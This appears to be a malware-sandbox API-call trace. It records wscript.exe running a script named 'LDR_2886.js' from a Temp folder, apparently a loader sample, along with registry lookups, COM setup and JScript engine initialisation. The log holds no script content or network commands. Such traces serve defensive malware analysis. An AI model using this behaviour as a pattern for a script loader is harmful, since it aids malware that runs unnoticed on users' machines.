	[0250.322] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.322] CoTaskMemFree (pv=0x215590) 
	[0252.329] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2159d0
	[0258.973] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215bf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.973] CoTaskMemFree (pv=0x215bf0) 
	[0258.986] CoTaskMemAlloc (cb=0x104) returned 0x215bf0
	[0258.986] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x215bf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.987] CoTaskMemFree (pv=0x215bf0) 
	[0258.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0258.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0258.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0258.990] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74

Thread:
	id = 194
	os_tid = 0xa30


Thread:
	id = 196
	os_tid = 0xa0c


Thread:
	id = 197
	os_tid = 0xb7c


Thread:
	id = 198
	os_tid = 0xaec


Thread:
	id = 204
	os_tid = 0xbb8


Thread:
	id = 205
	os_tid = 0x808


Thread:
	id = 206
	os_tid = 0xa20

	[0085.131] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0149.602] RegCloseKey (hKey=0x32c) returned 0x0
	[0149.602] LocalFree (hMem=0x1c38f0) returned 0x0
	[0149.602] CloseHandle (hObject=0x324) returned 1
	[0149.602] CloseHandle (hObject=0x13) returned 1
	[0149.603] CloseHandle (hObject=0xf) returned 1
	[0149.603] RegCloseKey (hKey=0x310) returned 0x0
	[0149.680] RegCloseKey (hKey=0x30c) returned 0x0
	[0149.680] RegCloseKey (hKey=0x308) returned 0x0
	[0149.680] LocalFree (hMem=0x1c38c0) returned 0x0
	[0166.290] RegCloseKey (hKey=0x158) returned 0x0
	[0213.513] RegCloseKey (hKey=0x378) returned 0x0
	[0213.513] RegCloseKey (hKey=0x35c) returned 0x0
	[0213.514] RegCloseKey (hKey=0x358) returned 0x0
	[0213.514] RegCloseKey (hKey=0x354) returned 0x0
	[0213.514] RegCloseKey (hKey=0x350) returned 0x0
	[0213.514] RegCloseKey (hKey=0x34c) returned 0x0
	[0213.514] RegCloseKey (hKey=0x348) returned 0x0
	[0213.515] RegCloseKey (hKey=0x328) returned 0x0
	[0213.515] RegCloseKey (hKey=0x374) returned 0x0
	[0213.515] RegCloseKey (hKey=0x33c) returned 0x0
	[0213.515] RegCloseKey (hKey=0x338) returned 0x0
	[0213.516] RegCloseKey (hKey=0x334) returned 0x0
	[0213.516] RegCloseKey (hKey=0x330) returned 0x0
	[0213.516] RegCloseKey (hKey=0x32c) returned 0x0
	[0213.516] RegCloseKey (hKey=0x324) returned 0x0
	[0213.516] RegCloseKey (hKey=0x310) returned 0x0
	[0213.517] RegCloseKey (hKey=0x308) returned 0x0
	[0213.517] RegCloseKey (hKey=0x158) returned 0x0
	[0213.517] RegCloseKey (hKey=0x370) returned 0x0
	[0213.517] RegCloseKey (hKey=0x36c) returned 0x0
	[0213.517] RegCloseKey (hKey=0x368) returned 0x0
	[0213.518] RegCloseKey (hKey=0x364) returned 0x0
	[0213.518] RegCloseKey (hKey=0x320) returned 0x0
	[0252.699] RegCloseKey (hKey=0x370) returned 0x0
	[0252.699] RegCloseKey (hKey=0x36c) returned 0x0
	[0252.700] RegCloseKey (hKey=0x368) returned 0x0
	[0252.700] RegCloseKey (hKey=0x364) returned 0x0
	[0252.700] RegCloseKey (hKey=0x320) returned 0x0
	[0252.700] RegCloseKey (hKey=0x360) returned 0x0
	[0252.700] RegCloseKey (hKey=0x158) returned 0x0

Process:
	id = "24"
	image_name = "wscript.exe"
	filename = "c:\\windows\\system32\\wscript.exe"
	page_root = "0x4c0a1000"
	os_pid = "0xb14"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x910"
	cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 191
	os_tid = 0xb28

	[0082.974] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fdc0 | out: lpSystemTimeAsFileTime=0x22fdc0*(dwLowDateTime=0xa9d034b0, dwHighDateTime=0x1d543d1)) 
	[0082.974] GetCurrentProcessId () returned 0xb14
	[0082.974] GetCurrentThreadId () returned 0xb28
	[0082.974] GetTickCount () returned 0x2561a
	[0082.974] QueryPerformanceCounter (in: lpPerformanceCount=0x22fdc8 | out: lpPerformanceCount=0x22fdc8*=20740044401) returned 1
	[0082.975] GetStartupInfoA (in: lpStartupInfo=0x22fde0 | out: lpStartupInfo=0x22fde0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffffffffffff, hStdOutput=0xffffffffffffffff, hStdError=0xffffffffffffffff)) 
	[0082.975] GetModuleHandleA (lpModuleName=0x0) returned 0xff6b0000
	[0082.975] GetModuleHandleA (lpModuleName=0x0) returned 0xff6b0000
	[0082.975] GetVersionExA (in: lpVersionInformation=0x22fd00*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x331eb0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x22fd00*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0082.975] GetUserDefaultLCID () returned 0x409
	[0082.975] CoInitialize (pvReserved=0x0) returned 0x0
	[0083.160] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	[0083.160] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" ") returned 85
	[0083.160] ??2@YAPEAX_K@Z () returned 0x3057b0
	[0083.160] ??2@YAPEAX_K@Z () returned 0x305f60
	[0083.160] GetCurrentThreadId () returned 0xb28
	[0083.160] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fa48 | out: phkResult=0x22fa48*=0x7c) returned 0x0
	[0083.161] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fa40 | out: phkResult=0x22fa40*=0x80) returned 0x0
	[0083.161] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x22ed48, lpData=0x22f150, lpcbData=0x22ed40*=0x400 | out: lpType=0x22ed48*=0x0, lpData=0x22f150*=0x67, lpcbData=0x22ed40*=0x400) returned 0x2
	[0083.161] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x22ed48, lpData=0x22f150, lpcbData=0x22ed40*=0x400 | out: lpType=0x22ed48*=0x0, lpData=0x22f150*=0x67, lpcbData=0x22ed40*=0x400) returned 0x2
	[0083.161] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x22ed48, lpData=0x22f150, lpcbData=0x22ed40*=0x400 | out: lpType=0x22ed48*=0x0, lpData=0x22f150*=0x67, lpcbData=0x22ed40*=0x400) returned 0x2
	[0083.161] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0083.709] RegCloseKey (hKey=0x80) returned 0x0
	[0083.709] RegCloseKey (hKey=0x7c) returned 0x0
	[0083.709] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f760 | out: phkResult=0x22f760*=0x7c) returned 0x0
	[0083.709] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f758 | out: phkResult=0x22f758*=0x80) returned 0x0
	[0083.709] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x22ea68, lpData=0x22ee70, lpcbData=0x22ea60*=0x400 | out: lpType=0x22ea68*=0x0, lpData=0x22ee70*=0x0, lpcbData=0x22ea60*=0x400) returned 0x2
	[0083.709] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x22ea68, lpData=0x22ee70, lpcbData=0x22ea60*=0x400 | out: lpType=0x22ea68*=0x0, lpData=0x22ee70*=0x0, lpcbData=0x22ea60*=0x400) returned 0x2
	[0083.709] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x22ea68, lpData=0x22ee70, lpcbData=0x22ea60*=0x400 | out: lpType=0x22ea68*=0x0, lpData=0x22ee70*=0x0, lpcbData=0x22ea60*=0x400) returned 0x2
	[0083.709] RegCloseKey (hKey=0x80) returned 0x0
	[0083.709] RegCloseKey (hKey=0x7c) returned 0x0
	[0083.710] GetACP () returned 0x4e4
	[0083.710] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77040000
	[0083.710] GetProcAddress (hModule=0x77040000, lpProcName="HeapSetInformation") returned 0x7705c4a0
	[0083.710] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0083.710] FreeLibrary (hLibModule=0x77040000) returned 1
	[0083.710] ??2@YAPEAX_K@Z () returned 0x305f80
	[0083.711] CoRegisterMessageFilter (in: lpMessageFilter=0x305f80, lplpMessageFilter=0x305f90 | out: lplpMessageFilter=0x305f90*=0x0) returned 0x0
	[0083.711] GetModuleFileNameW (in: hModule=0xff6b0000, lpFilename=0x22faa0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0083.711] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x22f3f0 | out: lpdwHandle=0x22f3f0) returned 0x704
	[0083.711] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x22ece0 | out: lpData=0x22ece0) returned 1
	[0083.712] VerQueryValueW (in: pBlock=0x22ece0, lpSubBlock="\\", lplpBuffer=0x22f3f8, puLen=0x22f3f4 | out: lplpBuffer=0x22f3f8*=0x22ed08, puLen=0x22f3f4) returned 1
	[0083.712] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f448 | out: phkResult=0x22f448*=0x7c) returned 0x0
	[0083.712] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x22e798, lpData=0x22eba0, lpcbData=0x22e790*=0x400 | out: lpType=0x22e798*=0x0, lpData=0x22eba0*=0x0, lpcbData=0x22e790*=0x400) returned 0x2
	[0083.712] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f400 | out: phkResult=0x22f400*=0x80) returned 0x0
	[0083.712] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x22f3c4, lpData=0x22f440, lpcbData=0x22f3c0*=0x4 | out: lpType=0x22f3c4*=0x0, lpData=0x22f440*=0x70, lpcbData=0x22f3c0*=0x4) returned 0x2
	[0083.712] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x22e798, lpData=0x22eba0, lpcbData=0x22e790*=0x400 | out: lpType=0x22e798*=0x0, lpData=0x22eba0*=0x0, lpcbData=0x22e790*=0x400) returned 0x2
	[0083.712] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x22f3c4, lpData=0x22f440, lpcbData=0x22f3c0*=0x4 | out: lpType=0x22f3c4*=0x0, lpData=0x22f440*=0x70, lpcbData=0x22f3c0*=0x4) returned 0x2
	[0083.712] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x22e798, lpData=0x22eba0, lpcbData=0x22e790*=0x400 | out: lpType=0x22e798*=0x1, lpData="1", lpcbData=0x22e790*=0x4) returned 0x0
	[0083.712] lstrlenW (lpString="1") returned 1
	[0083.712] lstrlenW (lpString="0") returned 1
	[0083.712] lstrlenW (lpString="1") returned 1
	[0083.712] lstrlenW (lpString="no") returned 2
	[0083.712] lstrlenW (lpString="1") returned 1
	[0083.712] lstrlenW (lpString="false") returned 5
	[0083.712] RegCloseKey (hKey=0x80) returned 0x0
	[0083.712] RegCloseKey (hKey=0x7c) returned 0x0
	[0083.712] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x22f448, lpdwDisposition=0x0 | out: phkResult=0x22f448*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0083.712] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x22f3e4, lpData=0x22f440, lpcbData=0x22f3e0*=0x4 | out: lpType=0x22f3e4*=0x0, lpData=0x22f440*=0x70, lpcbData=0x22f3e0*=0x4) returned 0x2
	[0083.712] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x22e7b8, lpData=0x22ebc0, lpcbData=0x22e7b0*=0x400 | out: lpType=0x22e7b8*=0x1, lpData="1", lpcbData=0x22e7b0*=0x4) returned 0x0
	[0083.712] lstrlenW (lpString="1") returned 1
	[0083.712] lstrlenW (lpString="0") returned 1
	[0083.712] lstrlenW (lpString="1") returned 1
	[0083.713] lstrlenW (lpString="no") returned 2
	[0083.713] lstrlenW (lpString="1") returned 1
	[0083.713] lstrlenW (lpString="false") returned 5
	[0083.713] RegCloseKey (hKey=0x7c) returned 0x0
	[0083.713] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x22f448, lpdwDisposition=0x0 | out: phkResult=0x22f448*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0083.713] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x22f3e4, lpData=0x22f440, lpcbData=0x22f3e0*=0x4 | out: lpType=0x22f3e4*=0x0, lpData=0x22f440*=0x70, lpcbData=0x22f3e0*=0x4) returned 0x2
	[0083.713] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x22e7b8, lpData=0x22ebc0, lpcbData=0x22e7b0*=0x400 | out: lpType=0x22e7b8*=0x0, lpData=0x22ebc0*=0x31, lpcbData=0x22e7b0*=0x400) returned 0x2
	[0083.713] RegCloseKey (hKey=0x7c) returned 0x0
	[0083.713] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js") returned 48
	[0083.713] lstrlenW (lpString="js") returned 2
	[0083.713] lstrlenW (lpString="WSH") returned 3
	[0083.713] ??2@YAPEAX_K@Z () returned 0x305870
	[0083.713] LoadStringW (in: hInstance=0xff6b0000, uID=0x9c5, lpBuffer=0x22deb0, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
	[0083.713] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x22eef0*=0x0 | out: pptlib=0x22eef0*=0x35d100) returned 0x0
	[0083.719] ITypeLib:GetTypeInfoOfGuid (in: This=0x35d100, GUID=0xff6b58f0, ppTInfo=0x22eed8 | out: ppTInfo=0x22eed8*=0x35e4e8) returned 0x0
	[0083.721] ITypeInfo:GetRefTypeOfImplType (in: This=0x35e4e8, index=0xffffffff, pRefType=0x22eed0 | out: pRefType=0x22eed0*=0xfffffffe) returned 0x0
	[0083.721] ITypeInfo:GetRefTypeInfo (in: This=0x35e4e8, hreftype=0xfffffffe, ppTInfo=0xff6cf458 | out: ppTInfo=0xff6cf458*=0x35e540) returned 0x0
	[0083.721] IUnknown:Release (This=0x35e4e8) returned 0x1
	[0083.721] ??2@YAPEAX_K@Z () returned 0x305900
	[0083.721] ??2@YAPEAX_K@Z () returned 0x3059a0
	[0083.721] ??2@YAPEAX_K@Z () returned 0x305a00
	[0083.721] ITypeLib:GetTypeInfoOfGuid (in: This=0x35d100, GUID=0xff6b5950, ppTInfo=0x22eed8 | out: ppTInfo=0x22eed8*=0x35e598) returned 0x0
	[0083.721] ITypeInfo:GetRefTypeOfImplType (in: This=0x35e598, index=0xffffffff, pRefType=0x22eed0 | out: pRefType=0x22eed0*=0xfffffffe) returned 0x0
	[0083.721] ITypeInfo:GetRefTypeInfo (in: This=0x35e598, hreftype=0xfffffffe, ppTInfo=0xff6cf4d8 | out: ppTInfo=0xff6cf4d8*=0x35e5f0) returned 0x0
	[0083.721] IUnknown:Release (This=0x35e598) returned 0x1
	[0083.721] ITypeLib:GetTypeInfoOfGuid (in: This=0x35d100, GUID=0xff6b5960, ppTInfo=0x22eed8 | out: ppTInfo=0x22eed8*=0x35e648) returned 0x0
	[0083.721] ITypeInfo:GetRefTypeOfImplType (in: This=0x35e648, index=0xffffffff, pRefType=0x22eed0 | out: pRefType=0x22eed0*=0xfffffffe) returned 0x0
	[0083.721] ITypeInfo:GetRefTypeInfo (in: This=0x35e648, hreftype=0xfffffffe, ppTInfo=0xff6cf518 | out: ppTInfo=0xff6cf518*=0x35e6a0) returned 0x0
	[0083.722] IUnknown:Release (This=0x35e648) returned 0x1
	[0083.722] ITypeLib:GetTypeInfoOfGuid (in: This=0x35d100, GUID=0xff6b5910, ppTInfo=0x22eed8 | out: ppTInfo=0x22eed8*=0x35e6f8) returned 0x0
	[0083.722] ITypeInfo:GetRefTypeOfImplType (in: This=0x35e6f8, index=0xffffffff, pRefType=0x22eed0 | out: pRefType=0x22eed0*=0xfffffffe) returned 0x0
	[0083.722] ITypeInfo:GetRefTypeInfo (in: This=0x35e6f8, hreftype=0xfffffffe, ppTInfo=0xff6cf498 | out: ppTInfo=0xff6cf498*=0x35e750) returned 0x0
	[0083.722] IUnknown:Release (This=0x35e6f8) returned 0x1
	[0083.722] IUnknown:Release (This=0x35d100) returned 0x4
	[0083.722] ??2@YAPEAX_K@Z () returned 0x305a60
	[0083.722] GetCurrentThreadId () returned 0xb28
	[0083.722] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc
	[0083.722] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xff6c1cf8, lpParameter=0x305a60, dwCreationFlags=0x0, lpThreadId=0x305a88 | out: lpThreadId=0x305a88*=0x40c) returned 0xd4
	[0083.723] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x22f130*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0083.975] CloseHandle (hObject=0xcc) returned 1
	[0083.975] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", nBufferLength=0x104, lpBuffer=0x22f1c0, lpFilePart=0x22f1b0 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", lpFilePart=0x22f1b0*="LDR_2886.js") returned 0x30
	[0083.975] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".js", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e6d0 | out: phkResult=0x22e6d0*=0xe6) returned 0x0
	[0083.976] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x22e680, lpData=0x22e6e0, lpcbData=0x22e684*=0x800 | out: lpType=0x22e680*=0x1, lpData="JSFile", lpcbData=0x22e684*=0xe) returned 0x0
	[0083.976] RegCloseKey (hKey=0xe6) returned 0x0
	[0083.976] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="JSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e6d0 | out: phkResult=0x22e6d0*=0xe6) returned 0x0
	[0083.976] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x22e680, lpData=0x22ef50, lpcbData=0x22e684*=0x200 | out: lpType=0x22e680*=0x1, lpData="JScript", lpcbData=0x22e684*=0x10) returned 0x0
	[0083.976] RegCloseKey (hKey=0xe6) returned 0x0
	[0083.976] ??2@YAPEAX_K@Z () returned 0x3063a0
	[0083.976] GetProcessHeap () returned 0x330000
	[0083.976] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x0, Size=0x2000) returned 0x368430
	[0083.977] CLSIDFromString (in: lpsz="JScript", pclsid=0x22eec8 | out: pclsid=0x22eec8*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58))) returned 0x0
	[0083.977] CoCreateInstance (rclsid=0x22eec8*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xff6b1800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22eec0) 
	[0083.986] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22d0c0 | out: lpSystemTimeAsFileTime=0x22d0c0*(dwLowDateTime=0xaa6aee10, dwHighDateTime=0x1d543d1)) 
	[0083.986] GetCurrentProcessId () returned 0xb14
	[0083.986] GetCurrentThreadId () returned 0xb28
	[0083.986] GetTickCount () returned 0x25a10
	[0083.986] QueryPerformanceCounter (in: lpPerformanceCount=0x22d0c8 | out: lpPerformanceCount=0x22d0c8*=20841242208) returned 1
	[0083.987] malloc (_Size=0x100) returned 0x306670
	[0083.987] __dllonexit () returned 0x7fee1410728
	[0083.987] __dllonexit () returned 0x7fee1410780
	[0083.987] __dllonexit () returned 0x7fee1410750
	[0083.987] __dllonexit () returned 0x7fee14107b0
	[0083.987] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefd710000
	[0083.988] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegisterTraceGuidsA") returned 0x7717f570
	[0083.988] EtwRegisterTraceGuidsA () returned 0x0
	[0083.988] EtwRegisterTraceGuidsA () returned 0x0
	[0083.988] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22ccb0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0083.988] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegOpenKeyExA") returned 0x7fefd72b5f0
	[0083.988] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x22ce18 | out: phkResult=0x22ce18*=0x0) returned 0x2
	[0083.995] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\COM3", ulOptions=0x0, samDesired=0x20019, phkResult=0x22edf8 | out: phkResult=0x22edf8*=0x104) returned 0x0
	[0083.995] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegQueryValueExA") returned 0x7fefd72c480
	[0083.995] RegQueryValueExA (in: hKey=0x104, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x22edf0, lpData=0x22ede8, lpcbData=0x22ede0*=0x4 | out: lpType=0x22edf0*=0x4, lpData=0x22ede8*=0x1, lpcbData=0x22ede0*=0x4) returned 0x0
	[0083.996] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegCloseKey") returned 0x7fefd730710
	[0083.996] RegCloseKey (hKey=0x104) returned 0x0
	[0083.996] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefea30000
	[0083.996] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetObjectContext") returned 0x7fefea4c920
	[0083.996] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefea30000
	[0083.996] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoCreateInstance") returned 0x7fefea57490
	[0083.996] CoCreateInstance (in: rclsid=0x7fee147cba0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee147cd80*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x22edc0 | out: ppv=0x22edc0*=0x7fefec0a1b0) returned 0x0
	[0083.997] ??2@YAPEAX_K@Z () returned 0x306b30
	[0083.997] ??2@YAPEAX_KHPEBDH@Z () returned 0x305af0
	[0083.997] ??2@YAPEAX_K@Z () returned 0x306bf0
	[0083.997] ??2@YAPEAX_K@Z () returned 0x306c50
	[0083.998] ??2@YAPEAX_K@Z () returned 0x307140
	[0083.998] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x22ed80, nSize=0x27 | out: lpBuffer="") returned 0x0
	[0083.998] GetUserDefaultLCID () returned 0x409
	[0083.998] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
	[0083.999] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x22ee20, cchData=6 | out: lpLCData="1252") returned 5
	[0083.999] IsValidCodePage (CodePage=0x4e4) returned 1
